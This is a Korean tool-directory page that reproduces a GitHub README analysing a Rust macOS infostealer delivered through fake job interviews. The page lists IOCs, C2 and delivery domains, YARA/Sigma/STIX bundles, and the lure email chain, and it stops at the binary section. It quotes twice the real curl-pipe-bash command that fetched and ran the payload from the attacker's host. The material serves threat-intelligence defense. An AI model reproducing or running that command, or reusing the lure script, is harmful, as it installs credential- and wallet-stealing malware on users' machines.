Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
hyperhives-macos-infostealer-analysis — Full static analysis of HyperHives macOS Rust infostealer — 571 decrypted config values, C2 infrastructure, DPRK/Contagious Interview attribution, YARA/Sigma rules, STIX 2.1 bundle, ATT&CK Navigator layer | Kitploit
도구/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
Indicator of Compromise (IOC) ManagementOSINT (Open Source Intelligence)Reverse EngineeringForensicsMalware AnalysisThreat IntelligencePapers & ResearchLearning & EducationCurated Resources

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

Full static analysis of HyperHives macOS Rust infostealer — 571 decrypted config values, C2 infrastructure, DPRK/Contagious Interview attribution, YARA/Sigma rules, STIX 2.1 bundle, ATT&CK Navigator layer

저장소 보기웹사이트
314125개월 전Kitploit 검토 완료

HyperHives macOS 정보 탈취기 — 전체 기술 분석

저장소 검증 라이선스: MIT STIX 2.1 ATT&CK 탐색기

위협 인텔리전스: Wellfound(이전 AngelList)의 가짜 면접 파이프라인을 통해 전달되는 Rust 기반 macOS 유니버설 바이너리 정보 탈취기입니다. "HyperHive"의 운영자 페르소나 "Felix"는 대상자를 유인하여 macos.hyperhives.net에서 악성 설치 프로그램을 실행하도록 유도했습니다. 이 저장소는 완전한 정적 분석을 문서화합니다: 571개의 암호화된 구성 값 복구, C2 URL, Sentry DSN, 276개의 대상 Chrome 확장 프로그램 ID 포함.

샘플 SHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
C2 도메인cloudproxy.link
전달 도메인macos.hyperhives.net
유인 플랫폼Wellfound (이전 AngelList)
운영자 페르소나"HyperHive"의 "Felix"
VirusTotal9 / 63 탐지
분류공개 정보 / IOC 번들
마지막 업데이트2026년 4월

목차

  • 위협 인텔리전스 번들
  • 저장소 구조
  • 빠른 시작
  • 요약
  • 1 — 시작 과정
  • 2 — 바이너리
  • 3 — 탈취 대상
  • 4 — 복호화된 C2 인프라
  • 5 — 귀속
  • 6 — 암호 분석
  • 7 — MITRE ATT&CK 매핑
  • 8 — 지갑 및 확장 프로그램 ID 참조
  • 9 — 권장 조치
  • 10 — 방법론
  • 부록 A — 모든 276개 Chrome 확장 프로그램 ID
  • 범위 및 한계
  • 릴리즈 내역
  • 기여
  • 라이선스

위협 인텔리전스 번들

파일형식목적
iocs.txt일반 텍스트해시, 도메인, URL, IP, 이메일, Sentry ID — 블록리스트, MISP, OpenCTI에 붙여넣기
yara_rules.yarYARA 4.2+알려진 샘플 해시 매치 + Mach-O에 대한 휴리스틱 문자열 탐지
sigma_rules.ymlSigma프록시, DNS 및 프로세스 생성 규칙 — SIEM에 맞게 logsource 조정
stix/bundle.jsonSTIX 2.1지표, 악성코드 SDO, 인프라, ATT&CK 패턴 및 관계를 포함한 기계 판독 가능 CTI 번들
attack-navigator-layer.jsonATT&CK 탐색기시각적 기술 커버리지를 위해 ATT&CK 탐색기로 가져오기

저장소 구조```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

## 빠른 시작

샘플을 `sample/installer_binary`로 배치합니다 (해시 확인은 [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md)를 참조하세요), 그런 다음:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

컴포즈 파일은 network_mode: none, read_only: true를 적용하고 모든 Linux 기능을 제거합니다. 전체 처리 지침은 SECURITY.md를 참조하세요.


TL;DR

Wellfound(이전 AngelList)의 구인 공고가 운영자 페르소나 "Felix"("HyperHive")의 다중 이메일 사회 공학 체인으로 이어졌습니다. 표적의 기술적 배경을 칭찬하고 가짜 면접을 잡은 후, 공격자는 피해자에게 hyperhives.net에서 "제품을 검토"하고 특히 Settings → Diagnostics → Log를 살펴보라고 지시했습니다 — 이는 다음을 실행하기 위한 구실이었습니다.``` curl -s https://macos.hyperhives.net/install | nohup bash &

페이로드는 **8.5 MB Mach-O 유니버설 바이너리**(x86_64 + arm64)이며 Rust로 컴파일되었습니다. 에어갭(air-gapped) Docker 랩과 **570개의 고유 x86_64 헬퍼 루틴**의 CPU 에뮬레이션을 통한 정적 분석으로 **모든 571개 암호화된 구성 값**이 복구되어 다음이 노출되었습니다:

- **C2:** `cloudproxy.link` — 4개의 HTTPS 엔드포인트
- **Sentry (속성 피벗):** `ingest.de.sentry.io`의 org/project ID를 포함한 전체 DSN
- **빌드 식별:** Cargo 사용자 `rootr`, 코드명 `force`, 버전 `9.12.1`
- **대상:** 276개의 Chrome 확장 프로그램 ID (암호화폐 지갑, 비밀번호 관리자, 기업 자격 증명)

전술은 **DPRK 연계 Contagious Interview** 캠페인과 일치합니다 — 합법적인 플랫폼에서의 가짜 채용, 다단계 신뢰 구축, `curl | bash` 전달, Rust macOS 스틸러, 암호화폐 중심의 유출.

---

## 1 — 어떻게 시작되었나

### 유인책: Wellfound의 가짜 면접 제의

공격은 **Wellfound(구 AngelList)의 합법적인 구인 게시글**로 시작되었습니다. 대상자가 지원한 후, 운영자가 **"Felix"** 라는 가상 인물과 회사명 **"HyperHive"** 를 사용하여 다음과 같은 이메일 체인이 이어졌습니다.

**이메일 1** (2026년 4월 4일) — 최초 접촉. "Felix"는 대상자의 이력서와 LinkedIn을 확인했다고 밝히고, 그들의 "Tech Lead"가 진행을 승인했다고 주장하며 대상자의 실제 기술 경험을 구체적으로 언급했습니다. 이메일에는 HyperHive가 "다양한 운영 체제에서 Hyperhives의 데스크톱 버전을 구축 중"이라고 명시되어 있고, UTC+0으로 면접 일정을 잡도록 초대했습니다.

**이메일 2** (2026년 4월 5일) — 후속 일정 조정. 특정 면접 시간(4월 8일 15:00 UTC)을 제안하고 중요한 페이로드 전달 지침을 포함했습니다.

> *"가능하시다면, **설정 → 진단 → 로그**에서 제품 로그를 간략히 살펴봐 주세요. 로그와 그 외 제품 관찰 사항에 대한 간단한 의견을 요청할 수 있습니다. 이는 종종 엔지니어링 경험과 세부 사항에 대한 주의력을 판단하는 좋은 신호가 됩니다."*

이를 통해 대상자는 `https://hyperhives.net`으로 이동하게 되었고, 진단 섹션으로 이동하면 다음이 트리거되었습니다:```
curl -s https://macos.hyperhives.net/install | nohup bash &

다음에 일어난 일

명령은 8.5MB Mach-O 유니버설 바이너리를 다운로드하여 실행했습니다. AppleScript를 통해 가짜 macOS 암호 대화상자가 나타났습니다. 암호는 입력되지 않았습니다. 프로세스가 즉시 종료되었고 샘플은 분석을 위해 보존되었습니다.

사회공학적 기술 요약

요소세부사항
PlatformWellfound (AngelList) — 합법적인 구인 게시판
Company name"HyperHive" (단수) / 도메인 hyperhives.net
Persona"Felix"
Contact email[email protected]
Trust building실제 대상의 이력서, LinkedIn 및 특정 기술 역량 참조
Pretext"면접 전에 제품을 검토하세요"
Payload triggerhyperhives.net에서 "설정 → 진단 → 로그 확인"
Scheduling가짜 면접 일정 (4월 8일 15:00 UTC)으로 긴급성 유지
Multi-step chain최소 2일 동안 2통의 이메일 전송 후 페이로드 전달

2 — 바이너리

도구 다운로드